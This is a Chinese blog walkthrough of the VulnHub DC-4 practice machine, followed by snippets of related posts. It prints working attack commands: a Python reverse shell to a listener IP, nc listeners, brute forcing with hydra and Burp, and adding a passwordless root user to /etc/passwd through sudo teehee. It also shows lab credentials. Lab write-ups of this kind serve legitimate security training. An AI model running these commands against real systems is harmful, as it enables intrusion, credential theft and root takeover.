vulnhub靶机渗透DC-4

DC4靶机入侵教程:信息收集与权限提升
最新推荐文章于 2023-04-06 20:30:00 发布
原创 最新推荐文章于 2023-04-06 20:30:00 发布 · 275 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

本文介绍了如何对DC4靶机进行环境搭建,通过nmap进行信息收集,发现Web登录页面并尝试暴力破解获取密码。成功登录后,利用命令执行功能反弹shell,进一步通过旧密码文件爆破SSH获取jim用户权限。最后,通过SUID权限提升,利用teehee命令提权至root并找到flag。

靶机入侵——DC4

1、环境搭建

下载地址:https://www.vulnhub.com/entry/dc-4,313/

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24
    在这里插入图片描述
    192.168.80.132 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24

  • 端口扫描

    使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.132
    在这里插入图片描述

  • web端进一步信息收集
    在这里插入图片描述
    ​ 发现web端为一个登录页面。中间件为nginx 1.15.10 语言为php 。信息较少

3、漏洞探测与利用

  • 登录框简单测试了一下没有发现sql注入等漏洞。只能尝试暴力破解了。使用burpsuite中的攻击模块,爆破密码
    在这里插入图片描述

我们得到密码为happy (可能是触发了靶机的某种机制,爆破一定次数后(为了打靶能继续下去),直接可以任意密码登录。密码错误为:499字节大小的包)

  • 登录后,发现一个执行命令的功能。
    在这里插入图片描述
    在这里插入图片描述

  • 抓包,尝试反弹shell

    在kail中开启监听:nc -lvvp 10086,使用linux自带的nc反弹shell:
    在这里插入图片描述在这里插入图片描述

  • 利用python反弹,获得交互式shell,方便使用:python -c ‘import pty; pty.spawn(“/bin/bash”)’

    也可在上一步的时候直接一步到位:python±c+“import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘192.168.80.130’,10086));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/bash’,‘-i’]);”
    在这里插入图片描述

  • cd 到home目录,发现有三个用户,看能不能找到flag
    在这里插入图片描述

  • 在jim用户目录下发现了一个old-passwords.bak 文件,可以利用它进行ssh爆破。
    在这里插入图片描述

  • 现在需要将其下载到kail中,在靶机利用python搭建http服务:(python2)python -m SimpleHTTPServer 8080

    python3使用:python -m http.server 8080
    在这里插入图片描述

  • 使用hydra爆破ssh服务

    hydra -l jim -P old-passwords.bak ssh://192.168.80.132 -vV -f -t 6
    在这里插入图片描述

  • 得到jim用户的密码为:jibril04 ,使用ssh登录靶机

4、权限提升

  • 登录ssh时提示我们有一个邮件,我们找找看
    在这里插入图片描述

  • 我们查看邮寄 cd/var/mail 发现了jim里面有个Charles密码:^xHhA&hvim0y 尝试切换登入
    在这里插入图片描述
    在这里插入图片描述

  • 尝试SUID提权:find / -perm -4000 -print 2>/dev/null

    常见提权文件:

    vim
find
bash
more
less
nano
cp

在这里插入图片描述

  • 免密使用的root级别命令:sudo -l

    我们发现可以使用teehee进行提权
    在这里插入图片描述

  • 提权思路一是利用teehee的root权限在passwd中写入一个免密的root权限用户:

    echo “hack::0:0:::/bin/bash” | sudo teehee -a /etc/passwd
    在这里插入图片描述

  • 成功提权,找到flag
    在这里插入图片描述

vulnhub---DC-4靶机
qq_43168364的博客
08-21 2166
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1899
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
vulnhub靶机DC-4
m0_52328368的博客
08-19 1260
vulnhubdc-4详细步骤
vulnhub系列靶机--DC4
cyzCc的博客
02-23 880
vulnhub系列靶机DC4 1.使用nmap扫描主机ip nmap -sP 192.168.211.1/24 目标靶机的ip为192.168.211.137 2.扫描目标靶机开放的端口服务 nmap -A 192.168.211.137 -p 1-65535 目标靶机开放了22端口和80端口 我们在浏览器上访问80端口 发现一个admin登录框 尝试使用burp爆破,首先找到kali里面...
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 5082
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
精选资源
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 652
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
vulnhub靶机渗透DC-5
RestoreJustice的博客
03-17 301
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/
精选资源
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
精选资源
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vulnhub DC4 靶场练习
鸥鹭忘机
08-16 797
前言 这次练习的靶机vulnhub平台下的DC系列靶机第四台,下载地址为https://www.vulnhub.com/entry/dc-4,313/。该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-4靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 然后需要溢出CD/DVD选项,这个启动时候会自动检测并连接
Vulnhub DC-4
Pai_Space
02-17 697
描述: 只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。 192.168.37.133 直接 submit 就可以登录 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f ...
VulnHub DC4
baynk的博客
05-18 432
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-4,313/ 下载地址2:https://pan.baidu.com/s/1VSecvfMlV7dN1-W7YlxrHg 提取码: tiwz 只有一个flag,但是给了多个切入点。 开肝。 0x01 渗透流程 nmap走起 服务端口继续扫 这次有两个端口存在,不可能ssh弱密码吧,还是先来80了。 只有这么一个登陆界面,试了SQL什么都没反应,sqlmap也一把梭过了,啥都没。通过页面的信息收集也找
vulnhub-dc4
bqnagus
10-05 1273
vulnhub-dc4靶机复现
vulnhub-DC4
weixin_55129870的博客
05-16 176
kaliip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC4ip: 192.168.44.144 端口扫描 nmap -A -p1-65535 -T4 192.168.44.144 开放80、22端口,对应http,ssh服务 访问http服务 指纹识别 whatweb http://192.168.44.144 得知,web服务器为nginx 1.15.10 爆破吧,猜测用户名为admin,使用kali的/.
vulnhubdc4
qq_54030686的博客
06-09 636
参考官方文档进行操作 这个靶场和其他的靶场还是有一些区别的,简单描述的话,就是拐弯抹角了,不会直接让你进行提权的操作,这篇官方文档中的有些观点,个人感觉有一些问题主机发现 目标IP为192.16843.138,攻击IP为192.168.43.128 进行端口扫描 目标存在22 ssh端口 80 http端口,话不多说,ssh爆破,掏出top100 未成功爆破,从http(80)端口下手,指纹识别 未识别到相关框架 只存在一个登录框,并且为明文传输,话不多说,掏出破解版bp和top1000,破解版跑的快,
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 531
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1928
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
靶机DC-4
weixin_43940853的博客
11-21 478
kali : 192.168.230.226 靶机 :192.168.230.229 开放了web和ssh,还是从web入手 有个登陆页面,这里试了几个弱口令,不能登,看Wp说是爆破一下密码是happy,这里就跳过了(真实情况下哪有这么容易就登陆,主要是积累一下提权方式吧) 发现有可以执行命令的地方,这就想到了反弹一个shell,前面有一个Acid靶机也是这样做的,不过这个靶机是用的netc...
vulnhub靶机dc-1
最新发布
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值